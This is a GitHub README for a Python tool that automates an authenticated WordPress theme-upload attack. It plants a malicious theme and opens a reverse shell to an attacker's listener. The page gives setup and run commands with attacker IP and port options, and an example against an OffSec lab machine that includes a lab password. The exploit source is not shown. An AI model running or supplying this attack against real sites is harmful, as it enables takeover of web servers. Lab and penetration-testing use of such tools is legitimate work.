Skip to content

DLL00P/Wordpress-Theme-Upload-Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

WordPress Theme Upload Exploit

This script is designed to make WordPress exploitation faster and more efficient by loading themes without having to do it manually, which saves you a lot of time since most of the time WordPress is very slow or even gives you errors.

Setup

git clone https://github.com/DLL00P/Wordpress-Theme-Upload-Exploit
cd Wordpress-Theme-Upload-Exploit
python3 exploit.py -u "URL" -U "USER" -P "PASSWORD" -lh "YOUR_IP" -lp "YOUR_PORT" -s "SHELL_TYPE"

Options

-u, --url       Target URL (e.g., http://127.0.0.1/)
-U, --username  WordPress username
-P, --password  WordPress password
-lh, --lhost    Attacker's local IP (listener host)
-lp, --lport    Attacker's local port (listener port)
-s, --shell     Shell type (bash, sh, powershell, cmd). Default: powershell
-t, --theme     Theme name. Default: EvilTheme

Usage

    python3 exploit.py -u http://192.168.110.55/shenzi/wp-admin/ -U admin -P FeltHeadwallWight357 -lh 192.168.45.199 -lp 1234 -s powershell

Example done on the Shenzi machine from OffSec and as it is a Windows machine we put powershell

imagen

About

A tool explotation create with python that exploit theme upload on wordpress and automatize it

Topics

python wordpress exploit python3 explotation

Resources

Readme

License

GPL-3.0 license
Activity

Stars

4 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages